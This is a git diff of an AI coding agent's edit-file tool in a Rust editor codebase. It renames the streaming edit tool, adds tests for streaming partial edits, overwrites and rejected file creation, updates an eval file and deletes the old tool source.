{ let end_point = buffer.max_point(); buffer.edit([(end_point..end_point, " added text")], None, cx); }); - // Verify buffer is dirty let is_dirty = buffer.read_with(cx, |buffer, _| buffer.is_dirty()); assert!(is_dirty, "Buffer should be dirty after in-memory edit"); // Try to edit - should fail because buffer has unsaved changes let result = cx .update(|cx| { - edit_tool.clone().run( + tool.clone().run( ToolInput::resolved(EditFileToolInput { display_description: "Edit with dirty buffer".into(), path: "root/test.txt".into(), mode: EditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "original content".into(), + new_text: "new content".into(), + }]), }), ToolCallEventStream::test().0, cx, @@ -2565,75 +3568,841 @@ mod tests { }) .await; - assert!(result.is_err(), "Edit should fail when buffer is dirty"); - let error_msg = result.unwrap_err().to_string(); + let EditFileToolOutput::Error { + error, + diff, + input_path, + } = result.unwrap_err() + else { + panic!("expected error"); + }; assert!( - error_msg.contains("This file has unsaved changes."), + error.contains("This file has unsaved changes."), "Error should mention unsaved changes, got: {}", - error_msg + error ); assert!( - error_msg.contains("keep or discard"), + error.contains("keep or discard"), "Error should ask whether to keep or discard changes, got: {}", - error_msg + error ); - // Since save_file and restore_file_from_disk tools aren't added to the thread, - // the error message should ask the user to manually save or revert assert!( - error_msg.contains("save or revert the file manually"), + error.contains("save or revert the file manually"), "Error should ask user to manually save or revert when tools aren't available, got: {}", - error_msg + error + ); + assert!(diff.is_empty()); + assert!(input_path.is_none()); + } + + #[gpui::test] + async fn test_streaming_overlapping_edits_resolved_sequentially(cx: &mut TestAppContext) { + // Edit 1's replacement introduces text that contains edit 2's + // old_text as a substring. Because edits resolve sequentially + // against the current buffer, edit 2 finds a unique match in + // the modified buffer and succeeds. + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "aaa\nbbb\nccc\nddd\neee\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Setup: resolve the buffer + sender.send_partial(json!({ + "display_description": "Overlapping edits", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + // Edit 1 replaces "bbb\nccc" with "XXX\nccc\nddd", so the + // buffer becomes "aaa\nXXX\nccc\nddd\nddd\neee\n". + // Edit 2's old_text "ccc\nddd" matches the first occurrence + // in the modified buffer and replaces it with "ZZZ". + // Edit 3 exists only to mark edit 2 as "complete" during streaming. + sender.send_partial(json!({ + "display_description": "Overlapping edits", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "bbb\nccc", "new_text": "XXX\nccc\nddd"}, + {"old_text": "ccc\nddd", "new_text": "ZZZ"}, + {"old_text": "eee", "new_text": "DUMMY"} + ] + })); + cx.run_until_parked(); + + // Send the final input with all three edits. + sender.send_full(json!({ + "display_description": "Overlapping edits", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "bbb\nccc", "new_text": "XXX\nccc\nddd"}, + {"old_text": "ccc\nddd", "new_text": "ZZZ"}, + {"old_text": "eee", "new_text": "DUMMY"} + ] + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "aaa\nXXX\nZZZ\nddd\nDUMMY\n"); + } + + #[gpui::test] + async fn test_streaming_create_content_streamed(cx: &mut TestAppContext) { + let (tool, project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Transition to BufferResolved + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write" + })); + cx.run_until_parked(); + + // Stream content incrementally + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": "line 1\n" + })); + cx.run_until_parked(); + + // Verify buffer has partial content + let buffer = project.update(cx, |project, cx| { + let path = project + .find_project_path("root/dir/new_file.txt", cx) + .unwrap(); + project.get_open_buffer(&path, cx).unwrap() + }); + assert_eq!(buffer.read_with(cx, |b, _| b.text()), "line 1\n"); + + // Stream more content + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": "line 1\nline 2\n" + })); + cx.run_until_parked(); + assert_eq!(buffer.read_with(cx, |b, _| b.text()), "line 1\nline 2\n"); + + // Stream final chunk + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": "line 1\nline 2\nline 3\n" + })); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |b, _| b.text()), + "line 1\nline 2\nline 3\n" + ); + + // Send final input + sender.send_full(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": "line 1\nline 2\nline 3\n" + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "line 1\nline 2\nline 3\n"); + } + + #[gpui::test] + async fn test_streaming_overwrite_diff_revealed_during_streaming(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "old line 1\nold line 2\nold line 3\n"}), + ) + .await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, mut receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Transition to BufferResolved + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write" + })); + cx.run_until_parked(); + + // Get the diff entity from the event stream + receiver.expect_update_fields().await; + let diff = receiver.expect_diff().await; + + // Diff starts pending with no revealed ranges + diff.read_with(cx, |diff, cx| { + assert!(matches!(diff, Diff::Pending(_))); + assert!(!diff.has_revealed_range(cx)); + }); + + // Stream first content chunk + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new line 1\n" + })); + cx.run_until_parked(); + + // Diff should now have revealed ranges showing the new content + diff.read_with(cx, |diff, cx| { + assert!(diff.has_revealed_range(cx)); + }); + + // Send final input + sender.send_full(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new line 1\nnew line 2\n" + })); + + let result = task.await; + let EditFileToolOutput::Success { + new_text, old_text, .. + } = result.unwrap() + else { + panic!("expected success"); + }; + assert_eq!(new_text, "new line 1\nnew line 2\n"); + assert_eq!(*old_text, "old line 1\nold line 2\nold line 3\n"); + + // Diff is finalized after completion + diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Finalized(_)))); + } + + #[gpui::test] + async fn test_streaming_overwrite_content_streamed(cx: &mut TestAppContext) { + let (tool, project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "old line 1\nold line 2\nold line 3\n"}), + ) + .await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Transition to BufferResolved + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write" + })); + cx.run_until_parked(); + + // Verify buffer still has old content (no content partial yet) + let buffer = project.update(cx, |project, cx| { + let path = project.find_project_path("root/file.txt", cx).unwrap(); + project.open_buffer(path, cx) + }); + let buffer = buffer.await.unwrap(); + assert_eq!( + buffer.read_with(cx, |b, _| b.text()), + "old line 1\nold line 2\nold line 3\n" + ); + + // First content partial replaces old content + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new line 1\n" + })); + cx.run_until_parked(); + assert_eq!(buffer.read_with(cx, |b, _| b.text()), "new line 1\n"); + + // Subsequent content partials append + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new line 1\nnew line 2\n" + })); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |b, _| b.text()), + "new line 1\nnew line 2\n" + ); + + // Send final input with complete content + sender.send_full(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new line 1\nnew line 2\nnew line 3\n" + })); + + let result = task.await; + let EditFileToolOutput::Success { + new_text, old_text, .. + } = result.unwrap() + else { + panic!("expected success"); + }; + assert_eq!(new_text, "new line 1\nnew line 2\nnew line 3\n"); + assert_eq!(*old_text, "old line 1\nold line 2\nold line 3\n"); + } + + #[gpui::test] + async fn test_streaming_edit_json_fixer_escape_corruption(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello\nworld\nfoo\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + // Simulate JSON fixer producing a literal backslash when the LLM + // stream cuts in the middle of a \n escape sequence. + // The old_text "hello\nworld" would be streamed as: + // partial 1: old_text = "hello\\" (fixer closes incomplete \n as \\) + // partial 2: old_text = "hello\nworld" (fixer corrected the escape) + sender.send_partial(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "hello\\"}] + })); + cx.run_until_parked(); + + // Now the fixer corrects it to the real newline. + sender.send_partial(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "hello\nworld"}] + })); + cx.run_until_parked(); + + // Send final. + sender.send_full(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "hello\nworld", "new_text": "HELLO\nWORLD"}] + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "HELLO\nWORLD\nfoo\n"); + } + + #[gpui::test] + async fn test_streaming_final_input_stringified_edits_succeeds(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello\nworld\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + sender.send_full(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit", + "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "HELLO\nWORLD\n"); + } + + // Verifies that after streaming_edit_file_tool edits a file, the action log + // reports changed buffers so that the Accept All / Reject All review UI appears. + #[gpui::test] + async fn test_streaming_edit_file_tool_registers_changed_buffers(cx: &mut TestAppContext) { + let (tool, _project, action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + agent_settings::AgentSettings::override_global(settings, cx); + }); + + let (event_stream, _rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Edit lines".to_string(), + path: "root/file.txt".into(), + mode: EditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "line 2".into(), + new_text: "modified line 2".into(), + }]), + }), + event_stream, + cx, + ) + }); + + let result = task.await; + assert!(result.is_ok(), "edit should succeed: {:?}", result.err()); + + cx.run_until_parked(); + + let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx)); + assert!( + !changed.is_empty(), + "action_log.changed_buffers() should be non-empty after streaming edit, + but no changed buffers were found - Accept All / Reject All will not appear" ); } + // Same test but for Write mode (overwrite entire file). #[gpui::test] - async fn test_sensitive_settings_kind_detects_nonexistent_subdirectory( + async fn test_streaming_edit_file_tool_write_mode_registers_changed_buffers( cx: &mut TestAppContext, ) { - let fs = project::FakeFs::new(cx.executor()); - let config_dir = paths::config_dir(); - fs.insert_tree(&*config_dir.to_string_lossy(), json!({})) - .await; - let path = config_dir.join("nonexistent_subdir_xyz").join("evil.json"); + let (tool, _project, action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "original content"})).await; + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + agent_settings::AgentSettings::override_global(settings, cx); + }); + + let (event_stream, _rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Overwrite file".to_string(), + path: "root/file.txt".into(), + mode: EditFileMode::Write, + content: Some("completely new content".into()), + edits: None, + }), + event_stream, + cx, + ) + }); + + let result = task.await; + assert!(result.is_ok(), "write should succeed: {:?}", result.err()); + + cx.run_until_parked(); + + let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx)); assert!( - matches!( - sensitive_settings_kind(&path, fs.as_ref()).await, - Some(SensitiveSettingsKind::Global) - ), - "Path in non-existent subdirectory of config dir should be detected as sensitive: {:?}", - path + !changed.is_empty(), + "action_log.changed_buffers() should be non-empty after streaming write, \ + but no changed buffers were found \u{2014} Accept All / Reject All will not appear" ); } #[gpui::test] - async fn test_sensitive_settings_kind_detects_deeply_nested_nonexistent_subdirectory( + async fn test_streaming_edit_file_tool_fields_out_of_order_in_write_mode( cx: &mut TestAppContext, ) { - let fs = project::FakeFs::new(cx.executor()); - let config_dir = paths::config_dir(); - fs.insert_tree(&*config_dir.to_string_lossy(), json!({})) - .await; - let path = config_dir.join("a").join("b").join("c").join("evil.json"); - assert!( - matches!( - sensitive_settings_kind(&path, fs.as_ref()).await, - Some(SensitiveSettingsKind::Global) - ), - "Path in deeply nested non-existent subdirectory of config dir should be detected as sensitive: {:?}", - path + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "old_content"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "write" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "write", + "content": "new_content" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "write", + "content": "new_content", + "path": "root" + })); + cx.run_until_parked(); + + // Send final. + sender.send_full(json!({ + "display_description": "Overwrite file", + "mode": "write", + "content": "new_content", + "path": "root/file.txt" + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "new_content"); + } + + #[gpui::test] + async fn test_streaming_edit_file_tool_fields_out_of_order_in_edit_mode( + cx: &mut TestAppContext, + ) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "old_content"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "edit" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content"}] + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content", "new_text": "new_content"}] + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content", "new_text": "new_content"}], + "path": "root" + })); + cx.run_until_parked(); + + // Send final. + sender.send_full(json!({ + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content", "new_text": "new_content"}], + "path": "root/file.txt" + })); + cx.run_until_parked(); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "new_content"); + } + + #[gpui::test] + async fn test_streaming_edit_partial_last_line(cx: &mut TestAppContext) { + let file_content = indoc::indoc! {r#" + fn on_query_change(&mut self, cx: &mut Context) { + self.filter(cx); + } + + + + fn render_search(&self, cx: &mut Context) -> Div { + div() + } + "#} + .to_string(); + + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.rs": file_content})).await; + + // The model sends old_text with a PARTIAL last line. + let old_text = "}\n\n\n\nfn render_search"; + let new_text = "}\n\nfn render_search"; + + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_full(json!({ + "display_description": "Remove extra blank lines", + "path": "root/file.rs", + "mode": "edit", + "edits": [{"old_text": old_text, "new_text": new_text}] + })); + + let result = task.await; + let EditFileToolOutput::Success { + new_text: final_text, + .. + } = result.unwrap() + else { + panic!("expected success"); + }; + + // The edit should reduce 3 blank lines to 1 blank line before + // fn render_search, without duplicating the function signature. + let expected = file_content.replace("}\n\n\n\nfn render_search", "}\n\nfn render_search"); + pretty_assertions::assert_eq!( + final_text, + expected, + "Edit should only remove blank lines before render_search" ); } #[gpui::test] - async fn test_sensitive_settings_kind_returns_none_for_non_config_path( + async fn test_streaming_edit_preserves_blank_line_after_trailing_newline_replacement( cx: &mut TestAppContext, ) { - let fs = project::FakeFs::new(cx.executor()); - let path = PathBuf::from("/tmp/not_a_config_dir/some_file.json"); + let file_content = "before\ntarget\n\nafter\n"; + let old_text = "target\n"; + let new_text = "one\ntwo\ntarget\n"; + let expected = "before\none\ntwo\ntarget\n\nafter\n"; + + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.rs": file_content})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_full(json!({ + "display_description": "description", + "path": "root/file.rs", + "mode": "edit", + "edits": [{"old_text": old_text, "new_text": new_text}] + })); + + let result = task.await; + + let EditFileToolOutput::Success { + new_text: final_text, + .. + } = result.unwrap() + else { + panic!("expected success"); + }; + + pretty_assertions::assert_eq!( + final_text, + expected, + "Edit should preserve a single blank line before test_after" + ); + } + + #[gpui::test] + async fn test_streaming_reject_created_file_deletes_it(cx: &mut TestAppContext) { + let (tool, _project, action_log, fs, _thread) = setup_test(cx, json!({"dir": {}})).await; + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + agent_settings::AgentSettings::override_global(settings, cx); + }); + + // Create a new file via the streaming edit file tool + let (event_stream, _rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Create new file".into(), + path: "root/dir/new_file.txt".into(), + mode: EditFileMode::Write, + content: Some("Hello, World!".into()), + edits: None, + }), + event_stream, + cx, + ) + }); + let result = task.await; + assert!(result.is_ok(), "create should succeed: {:?}", result.err()); + cx.run_until_parked(); + + assert!( + fs.is_file(path!("/root/dir/new_file.txt").as_ref()).await, + "file should exist after creation" + ); + + // Reject all edits — this should delete the newly created file + let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx)); + assert!( + !changed.is_empty(), + "action_log should track the created file as changed" + ); + + action_log + .update(cx, |log, cx| log.reject_all_edits(None, cx)) + .await; + cx.run_until_parked(); + assert!( - sensitive_settings_kind(&path, fs.as_ref()).await.is_none(), - "Path outside config dir should not be detected as sensitive: {:?}", - path + !fs.is_file(path!("/root/dir/new_file.txt").as_ref()).await, + "file should be deleted after rejecting creation, but an empty file was left behind" ); } + + #[test] + fn test_input_deserializes_double_encoded_fields() { + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "\"edit\"", + "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" + })) + .expect("input should deserialize"); + + assert!(matches!(input.mode, EditFileMode::Edit)); + let edits = input.edits.expect("edits should deserialize"); + assert_eq!(edits.len(), 1); + assert_eq!(edits[0].old_text, "hello\nworld"); + assert_eq!(edits[0].new_text, "HELLO\nWORLD"); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "\"edit\"" + })) + .expect("input should deserialize"); + assert!(input.edits.is_none()); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "\"edit\"", + "edits": null + })) + .expect("input should deserialize"); + assert!(input.edits.is_none()); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "\"edit\"", + "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" + })) + .expect("input should deserialize"); + + assert!(matches!(input.mode, Some(EditFileMode::Edit))); + let edits = input.edits.expect("edits should deserialize"); + assert_eq!(edits.len(), 1); + assert_eq!(edits[0].old_text.as_deref(), Some("hello\nworld")); + assert_eq!(edits[0].new_text.as_deref(), Some("HELLO\nWORLD")); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt" + })) + .expect("input should deserialize"); + assert!(input.mode.is_none()); + assert!(input.edits.is_none()); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": null, + "edits": null + })) + .expect("input should deserialize"); + assert!(input.mode.is_none()); + assert!(input.edits.is_none()); + } + + async fn setup_test_with_fs( + cx: &mut TestAppContext, + fs: Arc, + worktree_paths: &[&std::path::Path], + ) -> ( + Arc, + Entity, + Entity, + Arc, + Entity, + ) { + let project = Project::test(fs.clone(), worktree_paths.iter().copied(), cx).await; + let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); + let context_server_registry = + cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); + let model = Arc::new(FakeLanguageModel::default()); + let thread = cx.new(|cx| { + crate::Thread::new( + project.clone(), + cx.new(|_cx| ProjectContext::default()), + context_server_registry, + Templates::new(), + Some(model), + cx, + ) + }); + let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); + let tool = Arc::new(EditFileTool::new( + project.clone(), + thread.downgrade(), + action_log.clone(), + language_registry, + )); + (tool, project, action_log, fs, thread) + } + + async fn setup_test( + cx: &mut TestAppContext, + initial_tree: serde_json::Value, + ) -> ( + Arc, + Entity, + Entity, + Arc, + Entity, + ) { + init_test(cx); + let fs = project::FakeFs::new(cx.executor()); + fs.insert_tree("/root", initial_tree).await; + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await + } + + fn init_test(cx: &mut TestAppContext) { + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + SettingsStore::update_global(cx, |store: &mut SettingsStore, cx| { + store.update_user_settings(cx, |settings| { + settings + .project + .all_languages + .defaults + .ensure_final_newline_on_save = Some(false); + }); + }); + }); + } } diff --git a/crates/agent/src/edit_agent/reindent.rs b/crates/agent/src/tools/edit_file_tool/reindent.rs similarity index 100% rename from crates/agent/src/edit_agent/reindent.rs rename to crates/agent/src/tools/edit_file_tool/reindent.rs diff --git a/crates/agent/src/edit_agent/streaming_fuzzy_matcher.rs b/crates/agent/src/tools/edit_file_tool/streaming_fuzzy_matcher.rs similarity index 100% rename from crates/agent/src/edit_agent/streaming_fuzzy_matcher.rs rename to crates/agent/src/tools/edit_file_tool/streaming_fuzzy_matcher.rs diff --git a/crates/agent/src/tools/evals/streaming_edit_file.rs b/crates/agent/src/tools/evals/streaming_edit_file.rs index c82f652daca933..770e1f0effc2ab 100644 --- a/crates/agent/src/tools/evals/streaming_edit_file.rs +++ b/crates/agent/src/tools/evals/streaming_edit_file.rs @@ -1,8 +1,8 @@ -use crate::tools::streaming_edit_file_tool::*; +use crate::tools::edit_file_tool::*; use crate::{ AgentTool, ContextServerRegistry, EditFileTool, GrepTool, GrepToolInput, ListDirectoryTool, - ListDirectoryToolInput, ReadFileTool, ReadFileToolInput, StreamingEditFileTool, Template, - Templates, Thread, ToolCallEventStream, ToolInput, + ListDirectoryToolInput, ReadFileTool, ReadFileToolInput, Template, Templates, Thread, + ToolCallEventStream, ToolInput, }; use Role::*; use anyhow::{Context as _, Result}; @@ -73,7 +73,7 @@ impl EvalInput { struct EvalSample { text_before: String, text_after: String, - tool_input: StreamingEditFileToolInput, + tool_input: EditFileToolInput, diff: String, } @@ -359,12 +359,10 @@ impl StreamingEditToolTest { .collect(); tools.push(LanguageModelRequestTool { name: EditFileTool::NAME.to_string(), - description: StreamingEditFileTool::description().to_string(), - input_schema: StreamingEditFileTool::input_schema( - LanguageModelToolSchemaFormat::JsonSchema, - ) - .to_value(), - use_input_streaming: StreamingEditFileTool::supports_input_streaming(), + description: EditFileTool::description().to_string(), + input_schema: EditFileTool::input_schema(LanguageModelToolSchemaFormat::JsonSchema) + .to_value(), + use_input_streaming: EditFileTool::supports_input_streaming(), }); tools } @@ -464,7 +462,7 @@ impl StreamingEditToolTest { }); let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - let tool = Arc::new(StreamingEditFileTool::new( + let tool = Arc::new(EditFileTool::new( self.project.clone(), thread.downgrade(), action_log, @@ -488,7 +486,7 @@ impl StreamingEditToolTest { } }; - let StreamingEditFileToolOutput::Success { new_text, .. } = &output else { + let EditFileToolOutput::Success { new_text, .. } = &output else { anyhow::bail!("Tool returned error output: {}", output); }; @@ -517,7 +515,7 @@ impl StreamingEditToolTest { &self, request: LanguageModelRequest, cx: &mut TestAppContext, - ) -> Result { + ) -> Result { let model = self.model.clone(); let events = cx .update(|cx| { @@ -539,7 +537,7 @@ impl StreamingEditToolTest { if tool_use.is_input_complete && tool_use.name.as_ref() == EditFileTool::NAME => { - let input: StreamingEditFileToolInput = serde_json::from_value(tool_use.input) + let input: EditFileToolInput = serde_json::from_value(tool_use.input) .context("Failed to parse tool input as StreamingEditFileToolInput")?; return Ok(input); } diff --git a/crates/agent/src/tools/streaming_edit_file_tool.rs b/crates/agent/src/tools/streaming_edit_file_tool.rs deleted file mode 100644 index 7d229e1f53fa73..00000000000000 --- a/crates/agent/src/tools/streaming_edit_file_tool.rs +++ /dev/null @@ -1,4410 +0,0 @@ -use super::edit_file_tool::EditFileTool; -use super::restore_file_from_disk_tool::RestoreFileFromDiskTool; -use super::save_file_tool::SaveFileTool; -use super::tool_edit_parser::{ToolEditEvent, ToolEditParser}; -use crate::ToolInputPayload; -use crate::{ - AgentTool, Thread, ToolCallEventStream, ToolInput, - edit_agent::{ - reindent::{Reindenter, compute_indent_delta}, - streaming_fuzzy_matcher::StreamingFuzzyMatcher, - }, -}; -use acp_thread::Diff; -use action_log::ActionLog; -use agent_client_protocol::schema::{self as acp, ToolCallLocation, ToolCallUpdateFields}; -use anyhow::Result; -use collections::HashSet; -use futures::FutureExt as _; -use gpui::{App, AppContext, AsyncApp, Entity, Task, WeakEntity}; -use language::language_settings::{self, FormatOnSave}; -use language::{Buffer, LanguageRegistry}; -use language_model::LanguageModelToolResultContent; -use project::lsp_store::{FormatTrigger, LspFormatTarget}; -use project::{AgentLocation, Project, ProjectPath}; -use schemars::JsonSchema; -use serde::{ - Deserialize, Deserializer, Serialize, - de::{DeserializeOwned, Error as _}, -}; -use std::ops::Range; -use std::path::PathBuf; -use std::sync::Arc; -use streaming_diff::{CharOperation, StreamingDiff}; -use text::ToOffset; -use ui::SharedString; -use util::rel_path::RelPath; -use util::{Deferred, ResultExt}; - -const DEFAULT_UI_TEXT: &str = "Editing file"; - -/// This is a tool for creating a new file or editing an existing file. For moving or renaming files, you should generally use the `move_path` tool instead. -/// -/// Before using this tool: -/// -/// 1. Use the `read_file` tool to understand the file's contents and context -/// -/// 2. Verify the directory path is correct (only applicable when creating new files): -/// - Use the `list_directory` tool to verify the parent directory exists and is the correct location -#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] -pub struct StreamingEditFileToolInput { - /// A one-line, user-friendly markdown description of the edit. This will be shown in the UI. - /// - /// Be terse, but also descriptive in what you want to achieve with this edit. Avoid generic instructions. - /// - /// NEVER mention the file path in this description. - /// - /// Fix API endpoint URLs - /// Update copyright year in `page_footer` - /// - /// Make sure to include this field before all the others in the input object so that we can display it immediately. - pub display_description: String, - - /// The full path of the file to create or modify in the project. - /// - /// WARNING: When specifying which file path need changing, you MUST start each path with one of the project's root directories. - /// - /// The following examples assume we have two root directories in the project: - /// - /a/b/backend - /// - /c/d/frontend - /// - /// - /// `backend/src/main.rs` - /// - /// Notice how the file path starts with `backend`. Without that, the path would be ambiguous and the call would fail! - /// - /// - /// - /// `frontend/db.js` - /// - pub path: PathBuf, - - /// The mode of operation on the file. Possible values: - /// - 'write': Replace the entire contents of the file. If the file doesn't exist, it will be created. Requires 'content' field. - /// - 'edit': Make granular edits to an existing file. Requires 'edits' field. - /// - /// When a file already exists or you just created it, prefer editing it as opposed to recreating it from scratch. - #[serde(deserialize_with = "deserialize_maybe_stringified")] - pub mode: StreamingEditFileMode, - - /// The complete content for the new file (required for 'write' mode). - /// This field should contain the entire file content. - #[serde(default, skip_serializing_if = "Option::is_none")] - pub content: Option, - - /// List of edit operations to apply sequentially (required for 'edit' mode). - /// Each edit finds `old_text` in the file and 